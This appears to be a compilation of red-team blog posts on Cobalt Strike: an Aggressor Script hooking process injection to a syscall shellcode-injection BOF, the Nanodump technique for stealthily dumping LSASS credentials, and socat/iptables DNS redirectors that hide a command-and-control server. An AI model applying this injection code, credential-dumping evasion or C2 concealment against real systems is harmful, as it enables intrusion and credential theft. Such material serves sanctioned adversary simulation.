Now that we have gone through the simple example to get some understanding of how the PROCESS_INJECT_EXPLICIT hook works, let’s try something from the Community Kit. The example used here is from the BOFs project https://github.com/ajpc500/BOFs.  For the explicit injection implementation we will select a different technique from this repository. Use the example under the StaticSyscallsInject folder. 

Steps: 

  1. Clone or download the source for the BOF project. 
  2. Change directory into the StaticSyscallsInject directory. 
  3. Review the code within the directory to understand what is being done. 
  4. Compile the object file with the following command. (Optionally use make) 
x86_64-w64-mingw32-gcc -o syscallsinject.x64.o -c entry.c -masm=intel 

When using projects from the Community Kit, it is good practice to review the code and recompile the source even if object or binary files are provided.

Items to note in the entry.c file that are different than the simple example. 

  1. For this BOF notice that the entry point is ‘go’, which is different than ‘gox86’ or ‘gox64’. 
  2. The arguments that this BOF expects are the pid and dll.  The offset is not used. 
  3. Calls a function named InjectShellcode, which implements their injection technique instead.  That function: 
     • Opens the process 
     • Allocates memory in the process and copies the data into it 
     • Creates the thread and waits for completion 
     • Cleans up 

Now that we understand the differences between the simple example and this project’s code, we can modify the PROCESS_INJECT_EXPLICIT function from the simple example to work with this project.  Here is the modified PROCESS_INJECT_EXPLICIT function, which can be placed in a new file or added to an existing static_syscalls_inject.cna file. 

File: static_syscalls_inject.cna

# Hook to allow the user to define how the explicit injection technique 
# is implemented when executing post exploitation commands. 
# $1 = Beacon ID 
# $2 = memory injectable dll for the post exploitation command 
# $3 = the PID to inject into 
# $4 = offset to jump to 
# $5 = x86/x64 - memory injectable DLL arch 
set PROCESS_INJECT_EXPLICIT { 
local('$barch $handle $data $args'); 

# Set the architecture for the beacon's session 
$barch = barch($1); 

if ($barch eq "x86") { 
    warn("Static Syscalls Shellcode Injection BOF (@ajpc500) does not support x86. Use built in default"); 
    return $null; 
} 

if ($4 > 0) { 
    warn("Static Syscalls Shellcode Injection BOF (@ajpc500) does not support offset argument. Use built in default"); 
    return $null; 
} 

# read in the injection BOF based on barch 
warn("read the BOF: syscallsinject. $+ $barch $+ .o"); 
$handle = openf(script_resource("syscallsinject. $+ $barch $+ .o")); 
$data = readb($handle, -1); 
closef($handle); 

# pack our arguments needed for the BOF 
$args = bof_pack($1, "ib", $3, $2); 

btask($1, "Static Syscalls Shellcode Injection BOF (@ajpc500) into pid $3"); 

beacon_inline_execute($1, $data, "go", $args); 

# Let the caller know the hook was implemented. 
return 1; 
} 

Explanation

  • Lines 1-7 contain the header information about the function and arguments. 
  • Line 8 starts the function definition for the PROCESS_INJECT_EXPLICIT function. 
  • Line 9 defines the variables used in the function. 
  • Line 12 sets the architecture for the Beacon’s session. 
  • Lines 14-17 are added in this example because this project only supports x64 architecture injection.  When an x86 architecture is detected, the function returns $null to use the built-in technique. 
  • Lines 19-22 are added in this example because this project does not support the offset to jump to argument.  When a non-zero offset is detected, the function returns $null to use the built-in technique. 
  • Lines 25-28 read the syscallsinject.<arch>.o BOF which matches the Beacon’s session architecture.  This is required because the beacon_inline_execute function requires the BOF architecture to match the Beacon’s architecture. 
  • Line 31 packs the arguments that the BOF is expecting.  In this example we are passing $3 (pid) as an integer, and $2 (dll) as binary data. 
  • Line 33 reports the task to Beacon. 
  • Line 35 uses the beacon_inline_execute function to execute the BOF. 
  • Line 38 returns 1 to indicate the PROCESS_INJECT_EXPLICIT function was implemented. 

Load the Aggressor Script and Begin Using the Updated Hook

Next, load the Aggressor Script file into the Cobalt Strike client through the Cobalt Strike -> Script Manager interface.  Once the script is loaded you can execute the post exploitation commands defined in the table above and the command will now use this implementation. 

Example Using the keylogger Command

After loading the script, a command like keylogger will use the new hook.

keylogger command using the PROCESS_INJECT_EXPLICIT hook
Output in the script console when reading the BOF

Nanodump: A Red Team Approach to Minidumps

 

Motivation

Dumping Windows credentials is a technique that adversaries, and consequently Red Teamers, use routinely. It has been around for several years and is well documented by MITRE as technique T1003.001. During a Red Team engagement, however, early detection of this technique can keep the exercise from progressing to the stages where defenders would train against more complex manipulation and usage of the credentials.  

One of the options to overcome this limitation is to explicitly allow the execution of this technique. However, there is another way, which is both stealthier and more lightweight. The following article will dive into how it can be executed. 

Introduction 

ReactOS is an interesting and valuable project for anyone interested in understanding the low-level code of a Windows-like OS. We started with the path of least resistance and tried to compile minidump.c from ReactOS, but found this to be quite difficult. However, after carefully analyzing the minidump module from skelsec, we found the information we needed about the minidump file format. 

The minidump format is quite complex and has many structures, pointers, and sections. In order to keep things as simple as possible, we experimented with the minidump python module to remove and change several parts in order to understand if these were relevant. 

Streams 

A minidump is composed of multiple “streams” which are like sections that contain specific information. For example, ExceptionStream presumably contains information like the stack trace in case the minidump was created due to a crash. 

After testing with pypykatz we found that the only relevant streams were SystemInfoStream, ModuleListStream, and Memory64ListStream. This first finding simplified the process because limiting the number of streams reduced the processing that needed to be done. 
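To make the layout concrete, here is a minimal Python sketch of a minidump header followed by a stream directory that lists only those three streams. The field order and numeric constants come from the public minidump format; the function name and the placeholder payloads are illustrative assumptions, and this is not nanodump's actual code.

```python
import struct

# Constants from the public minidump format definitions.
MINIDUMP_SIGNATURE = 0x504D444D   # written little-endian, so the file starts with b"MDMP"
MINIDUMP_VERSION = 0xA793         # low 16 bits of the Version field
MODULE_LIST_STREAM = 4
SYSTEM_INFO_STREAM = 7
MEMORY64_LIST_STREAM = 9

HEADER_FORMAT = "<IIIIIIQ"        # MINIDUMP_HEADER: 32 bytes
DIRECTORY_FORMAT = "<III"         # MINIDUMP_DIRECTORY: stream type, data size, RVA


def build_header_and_directory(streams):
    """Return header + directory bytes for a list of (stream_type, payload) pairs.

    Hypothetical helper: payloads are assumed to be laid out back to back
    immediately after the directory.
    """
    header_size = struct.calcsize(HEADER_FORMAT)
    directory_size = struct.calcsize(DIRECTORY_FORMAT) * len(streams)
    header = struct.pack(
        HEADER_FORMAT,
        MINIDUMP_SIGNATURE,
        MINIDUMP_VERSION,
        len(streams),      # NumberOfStreams
        header_size,       # StreamDirectoryRva: directory follows the header
        0,                 # CheckSum (unused here)
        0,                 # TimeDateStamp (unused here)
        0,                 # Flags
    )
    rva = header_size + directory_size
    directory = b""
    for stream_type, payload in streams:
        directory += struct.pack(DIRECTORY_FORMAT, stream_type, len(payload), rva)
        rva += len(payload)
    return header + directory
```

With only three directory entries, a parser has very little to walk before it reaches the data that matters for credential extraction.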

SystemInfoStream 

This stream has information about the Windows machine, and it is not related to LSASS itself. It has relevant information such as the Windows version and build number, but also less relevant fields such as the number of processors. 

We ended up setting all the fields that were not needed to NULL. This made the process of creating the minidump a lot simpler, as we were able to ignore irrelevant fields. 

ModuleListStream 

All of the DLLs LSASS loaded are listed in this stream. It is worth noting that, while this stream is important, for this exercise, it wasn’t necessary to include every single DLL.  

In fact, we were able to ignore most of them and kept only those that are relevant to mimikatz, such as kerberos.dll and wdigest.dll. This decision effectively made the size of the dump a lot smaller. 

Memory64ListStream 

The actual memory pages of the LSASS process can be found in this stream. However, it takes up a lot of space, so reducing its size was critical to reduce the overall dump size. We decided to ignore any page that met any of the following conditions: 

  • Page wasn’t committed 
  • Page marked as mapped 
  • Page protection equals PAGE_NOACCESS 
  • Page marked as PAGE_GUARD 

Ignoring all these pages did not break the analysis of mimikatz, but did effectively reduce the size of the dump. 
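The four conditions above can be expressed as a small predicate. The sketch below is in Python for readability and is not nanodump's code; the constant values are the standard Windows memory constants, while the function and parameter names are illustrative assumptions.

```python
# Standard Windows memory constants.
MEM_COMMIT = 0x1000
MEM_MAPPED = 0x40000
PAGE_NOACCESS = 0x01
PAGE_GUARD = 0x100


def should_dump(state, mem_type, protect):
    """Return True if a memory region should be included in the dump.

    The arguments mirror the State, Type and Protect fields of a
    MEMORY_BASIC_INFORMATION structure (hypothetical helper).
    """
    if state != MEM_COMMIT:                   # page wasn't committed
        return False
    if mem_type == MEM_MAPPED:                # page marked as mapped
        return False
    if (protect & 0xFF) == PAGE_NOACCESS:     # base protection is PAGE_NOACCESS
        return False
    if protect & PAGE_GUARD:                  # PAGE_GUARD modifier is set
        return False
    return True
```

PAGE_GUARD is a modifier bit that is combined with a base protection value, which is why it is tested with a bitwise AND rather than an equality check.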

Final Size 

By taking out all the non-vital information from the dump we managed to reduce the dump from roughly 50MB down to 10MB. 

Obfuscation 

As explained earlier, another goal was to achieve some level of obfuscation. Given that the creation of the minidump is done programmatically, we had full control of the dump and thus could implement any obfuscation that we chose. 

We opted to corrupt the “magic bytes” (or signature) of the minidump file format, which is a simple, yet effective approach.  

Minidumps start with the 32-bit signature “PMDM” (0x504D444D), which appears on disk as the bytes “MDMP” because the value is stored in little endian. Changing these magic bytes would make it more difficult to figure out if a block of memory is a minidump, and since this is at the very start of the file, the binary blob wouldn’t look like a minidump, not even at creation time. 

This modification did break mimikatz and pypykatz. We created a small bash post-dump script to restore the original format once the dump is on the tester’s machine. 
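The idea is simple enough to sketch in a few lines. The example below is written in Python rather than bash and is not the script shipped with nanodump; the function names and the choice of replacement bytes are assumptions. It relies on the fact that a valid minidump file begins with the four bytes "MDMP".

```python
MINIDUMP_MAGIC = b"MDMP"  # first four bytes of a valid minidump file


def corrupt_signature(dump, fake=b"\x00\x00\x00\x00"):
    """Return a copy of the dump whose signature is replaced by `fake`."""
    if len(fake) != len(MINIDUMP_MAGIC):
        raise ValueError("replacement signature must be 4 bytes long")
    return fake + dump[len(MINIDUMP_MAGIC):]


def restore_signature(dump):
    """Return a copy of the dump with the original signature put back."""
    return MINIDUMP_MAGIC + dump[len(MINIDUMP_MAGIC):]
```

Only the first four bytes change, so restoring the file on the tester's machine is lossless.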

PID of LSASS 

To dump LSASS, you typically need to know the PID of the LSASS process. Listing all the running processes could be seen as abnormal or suspicious activity. Running tasklist or even calling CreateToolhelp32Snapshot might be detected by advanced security solutions. 

We decided to use the NtGetNextProcess syscall to loop over all the processes in the system until we found a process that had ‘lsass.exe’ loaded. This was a valid method to find the LSASS process and avoided having to go through the usual steps. 

Avoiding API calls 

Reducing the number of API calls was important for obvious reasons: userland hooks. The only Windows API call that nanodump calls is LookupPrivilegeValueW, which is used to enable SeDebugPrivilege. This privilege should already be enabled in most cases, but feel free to remove this call if you want to be even stealthier. Besides that, everything is done using syscalls to avoid userland hooks. 

Syscalls Support 

To use syscalls, we used SysWhispers2, so there was no need to re-compile nanodump for every new version of Windows. We had to make a few changes to the code to avoid using global variables, given that Beacon Object Files (BOF) do not support them. We also used InlineWhispers to build nanodump on Linux using Mingw. 

Fileless download 

We also wanted to have the possibility of downloading the dump using Beacon’s C2 channel without touching the disk. However, it can be written to a file if need be. 

No Beacon? No Problem 

As explained earlier, we initially started this project as part of our Red Team practice, allowing us to conduct complex threat actions. Sometimes we don’t need to go as far as deploying Beacon on each compromised machine, so we added the possibility to use an EXE version of nanodump. The one limitation of the EXE version is that you cannot use the fileless download feature, because it relies on Cobalt Strike’s C2 channel. 

Conclusion 

While creating a syscall-based minidump was challenging, it was also critical for many scenarios. Additionally, creating a malleable module capable of feeding the great mimikatz is a powerful and flexible approach. Modularizing software is a long-established idea, and it matters even more in this context, where success and future updates depend on keeping up with strong and dynamic detection tools. 
 

Do it Yourself 

If you’re interested in using nanodump, we’ve posted the code to our GitHub.  

Credits 

Thanks to: 

  • Skelsec for his amazing work with minidump and pypykatz. 
  • freefirex from CS-Situational-Awareness-BOF at TrustedSec for many cool tricks for BOFs. 
  • jthuraisamy for SysWhispers2 

How to Extend Your Reach with Cobalt Strike 

 

We’re often asked, “what does Cobalt Strike do?” In simple terms, Cobalt Strike is a post-exploitation framework for adversary simulations and Red Teaming to help measure your security operations program and incident response capabilities. Cobalt Strike provides a post-exploitation agent, Beacon, and covert channels to emulate a quiet long-term embedded actor in a network.  

If we as security testers and red teamers continue to test in the same ways during each engagement, our audience (i.e., the defensive side) will not get much value out of the exercises. It’s important to be nimble. Cobalt Strike provides substantial flexibility for users to change their behavior and adapt just as an adversary does. For example, Malleable C2 is a Command and Control language that lets you modify memory and network indicators to control how Beacon looks and feels on a network.  

Cobalt Strike was designed to be multiplayer. One of its foundational features is its ability to support multiple users accessing multiple servers and sharing sessions. Enabling participation from users with different styles and skillsets further varies behavior to enrich engagements.   

While there are also numerous built-in capabilities, one of which we’ll discuss below, they are limited to what the team adds to the tool. One of our favorite features of Cobalt Strike is its user developed modules, through which many of the built-in limits are overcome. In fact, users are encouraged to extend its capabilities with complementary tools and scripts to tailor the engagements to best meet the organization’s needs. We wanted to highlight a few ways we’ve recently seen Cobalt Strike users doing just that to conduct effective assessments.   

Interoperability with Core Impact 

Contrary to many perceptions, Cobalt Strike is actually not a penetration testing tool. As we mentioned earlier, we identify as a tool for post-exploitation adversary simulations and Red Team operations. However, we have recently begun offering interoperability with Core Impact, which is a penetration testing tool with features that align well with those of Cobalt Strike.  

Core Impact is typically used for exploitation and lateral movement and validating the attack paths often associated with a penetration test. Used by both in-house teams as well as third-party services, Core Impact offers capabilities for remote, local, and client-side exploitation. Impact also uses post-exploitation agents, which, while they don’t have a cool name like “Beacon,” are versatile in both their deployment and capabilities, including chaining and pivoting.   

While a previous blog dives deeper into the particulars, to quickly summarize, the interoperability piece comes in the form of session passing between both platforms. Those with both tools can deploy Beacon from within Core Impact. Additionally, users can spawn an Impact agent from within Cobalt Strike. If you have Cobalt Strike and would like to learn more, we recommend requesting a trial of Core Impact to try it out. 

Integration with Outflank’s RedELK Tool 

RedELK is an open-source tool that has been described by its creators as a “Red Team’s SIEM.” This highly usable tool tracks and sends Red Teams alerts about the activities of a Blue Team by creating a centralized hub for all traffic logs from redirectors to be sent and enriched.  Gaining visibility into the Blue Team’s movements enables Red Teams to make judicious choices about their next steps. These insights help Red Teams create a better learning experience and ensure Blue Teams get the most out of their engagements. 

Additionally, it also centralizes and enriches all operational logs from teamservers in order to provide a searchable history of the operation, which could be particularly helpful for longer and larger engagements. This all sounds like an ideal integration for Cobalt Strike users, right? While the sub-header is a fairly large spoiler, it is nonetheless very exciting that RedELK does fully support the Cobalt Strike framework.  

Community Kit Extensions  

We can’t say enough good things about the user community. So many of you have written first-rate tools and scripts that have further escalated the power of Cobalt Strike—we feel like an artist’s muse and the art the community creates is amazing. However, many of these extensions are tricky to find, so not everyone has had the opportunity to take advantage of and learn from them. In order to highlight all of this hard work, we’ve created the Community Kit. This central repository showcases projects from the user community to ensure that they’re more easily discovered by fellow security professionals. 

We encourage you to check it out to see the fantastic work of your peers, which can help raise the level of your next security engagement and may even inspire you to create and submit your own. Check back regularly, as new submissions are coming in frequently.  

A Dynamic Framework  

Cobalt Strike was intentionally built as an adaptable framework so that users could continually change their behavior in an engagement. However, this flexibility has also enabled both expected and unexpected growth of the tool itself. Planned additions like the interoperability with Core Impact allow users to benefit from session passing, while unanticipated extensions like those in the Community Kit are equally welcome, as they enable users to truly make the tool their own. Ultimately, we’re excited to see such dedication to this tool from all angles, as it motivates us all to keep advancing Cobalt Strike to the next level so users can keep increasing the value of every engagement.   

Want to learn more about Core Impact? 

Get information on other ways Core Impact and Cobalt Strike complement one another for comprehensive infrastructure protection. 

Simple DNS Redirectors for Cobalt Strike

 

This post, from Ernesto Alvarez Capandeguy of Core Security’s CoreLabs Research Team, describes techniques used for creating UDP redirectors for protecting Cobalt Strike team servers. This is one of the recommended mechanisms for hiding Cobalt Strike team servers and involves adding different points which a Beacon can contact for instructions when using the HTTP channel.

Unlike HTTP Beacons, DNS Beacons do not contact the team server directly, but use the DNS infrastructure for carrying messages. In theory, the team server should be referenced in the DNS records so that all queries for the Command and Control (C2) domain are delivered properly. This would mean exposing the team server to the Internet, which is not desirable.

Just as HTTP redirectors can be used to hide the team server from outside scrutiny, a DNS redirector can be used for the same thing. In the case of DNS, redirectors are just one part of the solution, as alternative domains are also necessary in case the original domain is taken down. We will not cover these aspects here, as we’ll be concentrating on the redirection part.

Redirecting TCP traffic is straightforward. A well-delimited set of data clearly defines what constitutes a network connection (or flow). The state is explicit and can be easily determined from the packet stream. There are several generic proxies (e.g. SOCAT) that can simply proxy TCP connections in user space. Options for secure proxying of TCP connections are also available (stunnel and SSH port forwarding are two well-known examples).

The situation is radically different for UDP. This is due to a few factors:

  • UDP is packet oriented, while TCP is byte/connection oriented.
  • UDP is stateless and keeping track of UDP “connections” requires second guessing the “connection” state.
  • UDP is handled very differently from TCP in userland.

In a TCP proxy operation, a connection is clearly defined. This connection can transmit EOF messages, so the proxy would always be aware of the state of the connection and would unambiguously know when it should release the connection resources.

UDP is more challenging, since without a way of directly sensing the DNS transaction state, SOCAT cannot know when to release the connection resources.

Simple Redirector Construction

The obvious solution for building a DNS redirector would be to use a DNS server. There are several choices for these, with differing features. We won’t touch on these options in this article, but will instead focus on simple redirectors that can be installed on minimal Linux systems and have a very small footprint.

Our redirectors will be based on the concept of diverting a UDP flow from the redirector’s local port to the team server in a way that the team server has to send the response back to the redirector, which will relay it to the Beacon.

There are two ways of achieving this goal: piping ports together and NAT.

Port Piping

We are all familiar with the concept of piping from a network port. Anyone can do it using netcat or an equivalent tool. Anyone with experience with any of these tools will also know that redirecting UDP traffic is sometimes problematic. A DNS redirector also has these problems, but they can be kept bounded.

For these tests, we are going to use SOCAT, a UNIX tool used to connect multiple types of inputs and outputs together. This tool can do the same thing as netcat but is more versatile.

Naive SOCAT Redirector

Before we jump into the solution, we should try to see the problems. Let’s attempt a naive approach to a DNS channel redirector. We can execute a straight SOCAT, and launch a Beacon pointed to our redirector, which will be executing the following:

# socat udp4-listen:53 udp4:teamserver.example.net:53

The initial installation works, and we see the ghost Beacon in the team server. However, any further communication fails. Monitoring the DNS traffic, we see the following:

# tcpdump -l -n -s 5655 -i eth0  udp port 53
 tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 5655 bytes
 
05:40:26.453966 IP 173.194.91.156.62931 > redirector.example.net.53: 55757% A? 7242b4ba.cobalt-domain.example.net. (51)
05:40:26.454317 IP redirector.example.net.56494 > teamserver.example.net.53: 55757% A? 7242b4ba.cobalt-domain.example.net. (51)
05:40:26.454593 IP teamserver.example.net.53 > redirector.example.net.56494: 55757- 1/0/0 A 0.0.0.0 (100)
05:40:26.454687 IP redirector.example.net.53 > 173.194.91.156.62931: 55757- 1/0/0 A 0.0.0.0 (100)
05:41:26.689753 IP 172.253.219.11.49854 > redirector.example.net.53: 56196% A? 7242b4ba.cobalt-domain.example.net. (51)
05:42:27.217514 IP 172.253.219.11.61868 > redirector.example.net.53: 28170% A? 7242b4ba.cobalt-domain.example.net. (51)
05:43:27.532055 IP 173.194.91.156.49467 > redirector.example.net.53: 59203% A? 7242b4ba.cobalt-domain.example.net. (51)
05:44:27.653780 IP 173.194.91.77.59444 > redirector.example.net.53: 14169% A? 7242b4ba.cobalt-domain.example.net. (51)
05:45:27.770012 IP 173.194.91.141.62374 > redirector.example.net.53: 52473% A? 7242b4ba.cobalt-domain.example.net. (51)
05:46:28.051530 IP 172.253.219.7.39179 > redirector.example.net.53: 26440% A? 7242b4ba.cobalt-domain.example.net. (51)
05:47:28.190316 IP 173.194.91.74.45768 > redirector.example.net.53: 41092% A? 7242b4ba.cobalt-domain.example.net. (51)

Well, the Beacon checked in fine, but after the first DNS request the pipeline stalls. This is because the UDP protocol is stateless. SOCAT never got the idea that the first transaction was over and is still waiting for data from the same source port, ignoring all the others.

This can easily be solved by telling SOCAT to fork for every packet it sees. Below we show our second attempt at doing a SOCAT redirector:

# socat udp4-listen:53,fork udp4:teamserver.example.net:53
 
# tcpdump -l -n -s 5655 -i eth0  udp port 53
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 5655 bytes
05:53:45.783953 IP 173.194.91.129.48083 > redirector.example.net.53: 3962% A? 7242b4ba.cobalt-domain.hlmnet.net. (51)
05:53:45.784730 IP redirector.example.net.34472 > teamserver.example.net.53: 3962% A? 7242b4ba.cobalt-domain.hlmnet.net. (51)
05:53:45.784860 IP teamserver.example.net.53 > redirector.example.net.34472: 3962- 1/0/0 A 0.0.0.0 (100)
05:53:45.784954 IP redirector.example.net.53 > 173.194.91.129.48083: 3962- 1/0/0 A 0.0.0.0 (100)
05:54:00.847401 IP 173.194.91.83.48991 > redirector.example.net.53: 57475% A? 7242b4ba.cobalt-domain.hlmnet.net. (51)
05:54:00.848289 IP redirector.example.net.46902 > teamserver.example.net.53: 57475% A? 7242b4ba.cobalt-domain.hlmnet.net. (51)
05:54:00.848436 IP teamserver.example.net.53 > redirector.example.net.46902: 57475- 1/0/0 A 0.0.0.0 (100)
05:54:00.848541 IP redirector.example.net.53 > 173.194.91.83.48991: 57475- 1/0/0 A 0.0.0.0 (100)
05:54:15.917608 IP 173.194.91.156.35560 > redirector.example.net.53: 29854% A? 7242b4ba.cobalt-domain.hlmnet.net. (51)
05:54:15.918490 IP redirector.example.net.55342 > teamserver.example.net.53: 29854% A? 7242b4ba.cobalt-domain.hlmnet.net. (51)
05:54:15.918615 IP teamserver.example.net.53 > redirector.example.net.55342: 29854- 1/0/0 A 0.0.0.0 (100)
05:54:15.918719 IP redirector.example.net.53 > 173.194.91.156.35560: 29854- 1/0/0 A 0.0.0.0 (100)

Our Beacon is now alive and communicating well! SOCAT now waits for packets coming from new sources and forwards them to our team server. While everything appears to be normal, this is unfortunately not the case, as this redirector will not work for long. Let’s inspect the process table:

# ps 
  PID TTY          TIME CMD
5365 pts/0    00:00:00 sudo
5366 pts/0    00:00:00 bash
5864 pts/0    00:00:00 socat
5865 pts/0    00:00:00 socat
5866 pts/0    00:00:00 socat
5867 pts/0    00:00:00 socat
5868 pts/0    00:00:00 socat
5869 pts/0    00:00:00 socat
5870 pts/0    00:00:00 socat
5871 pts/0    00:00:00 socat
5883 pts/0    00:00:00 socat
5886 pts/0    00:00:00 socat
5888 pts/0    00:00:00 socat
5889 pts/0    00:00:00 socat
5890 pts/0    00:00:00 socat
5891 pts/0    00:00:00 socat
5903 pts/0    00:00:00 socat
5904 pts/0    00:00:00 socat
5908 pts/0    00:00:00 socat
5910 pts/0    00:00:00 socat
5911 pts/0    00:00:00 socat
5912 pts/0    00:00:00 socat
5913 pts/0    00:00:00 socat
5914 pts/0    00:00:00 socat
5923 pts/0    00:00:00 ps

This does not look good. SOCAT processes are piling up. Let’s stress the redirector a bit by requesting a few screenshots and then check the process table:

# ps | grep socat | wc -l
3489

If we weren’t root, we would have run out of process slots long ago. Even the superuser will eventually have problems with this redirector:

socat udp4-listen:53,fork udp4:teamserver.example.net:53
2021/03/02 06:09:57 socat[5864] E fork(): Resource temporarily unavailable

As expected, we ran out of resources. Worse, we still have several thousand SOCAT processes waiting. The problem arises because SOCAT does not notice that a transaction has finished, and keeps its resources allocated.

Working UDP SOCAT Redirector

Now that we understand the problems involving UDP proxying, we can build a functional solution. The trick is telling SOCAT to drop the connections as soon as the transaction is complete. Telling SOCAT to apply a 5 second inactivity timeout should do the trick:

 # socat -T 5 udp4-listen:53,fork udp4:teamserver.example.net:53

In the example above, we told SOCAT that if no data is seen for five seconds, it should close the socket and assume that no further communication is needed.
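The behavior of each forked SOCAT child can be approximated in a few lines of Python. This is only a sketch of the concept, not how SOCAT is implemented; the function name, buffer size, and return value are assumptions made for illustration.

```python
import socket


def relay_one_transaction(listener, upstream_addr, timeout):
    """Relay a single UDP query/response pair, giving up after `timeout` seconds.

    `listener` is an already-bound UDP socket. Returns True if a reply was
    relayed back to the client and False if the upstream never answered.
    """
    query, client_addr = listener.recvfrom(4096)
    # A fresh socket per transaction plays the role of the forked child.
    upstream = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        upstream.settimeout(timeout)
        upstream.sendto(query, upstream_addr)
        try:
            reply, _ = upstream.recvfrom(4096)
        except socket.timeout:
            # No data within the timeout: assume the transaction is over.
            return False
        listener.sendto(reply, client_addr)
        return True
    finally:
        # Resources are always released, which is what the naive version lacked.
        upstream.close()
```

Without the timeout, the per-transaction socket would wait forever, which is the resource leak seen in the naive redirector.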

While five seconds is a reasonable default timeout, we can attempt to optimize this value. To fine tune the timeout, we should understand the problem we’re facing. A DNS request is sent to our redirector, which relays it to the team server. Once the team server answers, the transaction is over.

This limits our timeout to something we can control: the round-trip time between the redirector and the team server, including the time needed to process the request. A reasonable value would be twice the RTT between the hosts, to have some safety margin. Since our test hosts are in the same LAN, a timeout of one second should be more than enough for our example.

Below we show the process usage for five and one second timeouts:

The graph shows that the number of SOCAT processes rises as soon as there is activity, but the timeout causes the number of active processes to reach a plateau and stay at a certain value, depending on the activity and the timeout.
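As a rough back-of-the-envelope check, the height of that plateau can be estimated as the request rate multiplied by the lifetime of each forked process. The Python sketch below is an approximation under stated assumptions, not a measurement from the experiment: it assumes a steady request rate and that each process lives for about one round trip plus the inactivity timeout.

```python
def estimate_socat_processes(requests_per_second, timeout_seconds, rtt_seconds=0.0):
    """Estimate the steady-state number of forked SOCAT processes.

    Hypothetical helper: each request forks one process that lingers for
    roughly rtt_seconds + timeout_seconds before exiting.
    """
    return requests_per_second * (timeout_seconds + rtt_seconds)


# At 10 requests per second, a 5 second timeout keeps about 50 processes
# alive, while a 1 second timeout keeps about 10.
five_second_plateau = estimate_socat_processes(10, 5)
one_second_plateau = estimate_socat_processes(10, 1)
```

The estimate makes the trade-off explicit: lowering the timeout shrinks the plateau proportionally, as long as it stays above the time the team server needs to answer.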

Working SOCAT UDP/TCP Redirector

We now have a working redirector. We can also use SOCAT for UDP to TCP translation. For every UDP packet received, we can fork and open a TCP connection, sending the DNS data via TCP. It is very important not to recycle connections, because UDP is packet oriented while TCP is not. We should never put more than one packet within a TCP connection, because two packets might be joined or split. In theory, SOCAT might decide to split a DNS request in two UDP packets, but this does not happen in practice. You should know that there is always that risk when doing UDP to TCP translations.
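The reason for using one connection per packet can be seen with a small Python sketch. It uses a local stream socket pair as a stand-in for a TCP connection (an assumption made so the example runs without a network); the function name is hypothetical.

```python
import socket


def send_over_stream(messages):
    """Write each message to a stream socket and return everything the peer reads.

    A stream carries bytes, not packets, so the receiver has no way to tell
    where one message ended and the next began.
    """
    sender, receiver = socket.socketpair()
    try:
        for message in messages:
            sender.sendall(message)
        sender.shutdown(socket.SHUT_WR)   # signal EOF to the receiver
        chunks = []
        while True:
            chunk = receiver.recv(4096)
            if not chunk:                 # EOF: the sender is done
                break
            chunks.append(chunk)
        return b"".join(chunks)
    finally:
        sender.close()
        receiver.close()
```

Two queries written to the same stream arrive as one undifferentiated run of bytes, whereas a single query per connection is delimited by the connection's EOF.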

We tell SOCAT to take traffic from port 53, and for each packet, to open a connection to port 9191/tcp on the team server. The timeout is set to one second, which might be a bit too low, considering that TCP is involved:

# socat -T 1 udp4-listen:53,fork tcp4:teamserver.example.net:9191

Since we’re encapsulating our data within TCP, we need to run the following in the team server:

# socat -T 10 tcp4-listen:9191,fork udp4:127.0.0.1:53

Let’s now try generating some traffic and see what happens.

The dip in the middle represents a lapse in activity. The quick timeout allows for fast recovery. Overall, it’s not bad, but we also need to see how many open connections we have.

The numbers are somewhat high because TCP requires a wait period when a connection is closed from the client side. This wait is needed in case some control messages are lost, and it should not be removed if the protocol is to operate properly. This is not a problem, though, because the number of resources allocated reaches an equilibrium. A few RTTs after the activity goes down, the resource usage drops as well.

Once we have the translation capability, we can take advantage of it. With DNS over TCP connections, we can take advantage of other proxying utilities, like stunnel or SSH’s port forwarding, and attempt to hide the team server from public scrutiny. The team server can be kept in an isolated network, without being exposed to the Internet.

NAT Based Redirectors

Another possible solution involves NAT. The concept behind a NAT redirector is to apply two NAT operations to incoming packets. The packet must be redirected to the team server, but at the same time, the packet must also be translated so that it appears to come from the redirector.

Failing to apply the second operation will cause the team server to send its answer directly to the original sender instead of back through the redirector. That response will be ignored, as it will come from a different address than the DNS server that was queried.

For our NAT redirector, we use Linux’s IPTABLES.

IPTABLES Based Redirector

IPTABLES is also well suited for use as a redirector. The Linux kernel’s NAT system automatically keeps track of connection state, even for UDP traffic. The detection is based on timers and inactivity, but the system is well developed and very stable.

The advantage of IPTABLES redirectors is that they’re lightning fast, incredibly efficient, and robust. However, unlike SOCAT redirectors, they cannot convert from one protocol to another, as IPTABLES works by packet mangling.

To create a working redirector, two things need to happen at the same time. Once a DNS query reaches the redirector, it must be redirected to the team server. This requires a DNAT operation.

However, if DNAT is used alone the packet will be diverted without changing the source address. As we already explained, this is not a good result, so we’ll also need to execute a SNAT operation.

The decision for doing the double NAT needs to be taken before any of the operations take place, as the DNAT change in the PREROUTING rule will erase important information present in the packet (namely whether this packet is addressed to the redirector or not).

To execute both operations simultaneously, we call the MARK target in the PREROUTING chain, and match the packet using every parameter of interest. Once the packet is marked, we can apply all operations both in the PREROUTING and POSTROUTING chains, completely changing the packet.

One final detail is that IP forwarding must be enabled in the redirector, since all these operations count as a forward, even if the packet is sent through the same interface it came in.

In the end, there are four commands that need to be called:

# Enable IP forwarding
echo "1" > /proc/sys/net/ipv4/ip_forward

# Mark incoming DNS packets with the tag 0x400
# (my.ip.address is a placeholder for the redirector's own address)
iptables -t nat -A PREROUTING -m state --state NEW --protocol udp --destination my.ip.address \
    --destination-port 53 -j MARK --set-mark 0x400

# For every marked packet, apply a DNAT and a SNAT (in this case, a MASQUERADE)
# (teamserver.example.net is a placeholder for the team server's address)
iptables -t nat -A PREROUTING -m mark --mark 0x400 --protocol udp \
    -j DNAT --to-destination teamserver.example.net:53
iptables -t nat -A POSTROUTING -m mark --mark 0x400 -j MASQUERADE
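
As a minimal sketch, the same commands can be generated by a small helper so that the addresses and the mark are filled in consistently and can be reviewed before anything is applied. The function name redirector_rules and the example addresses (taken from the documentation ranges) are assumptions for illustration and are not part of the original setup. The helper only prints the commands; it does not change any firewall state.

```shell
#!/bin/sh
# Hypothetical helper: print the redirector commands for review.
# $1 = redirector IP, $2 = team server IP, $3 = mark (defaults to 0x400)
redirector_rules() {
    redirector_ip=$1
    teamserver_ip=$2
    mark=${3:-0x400}

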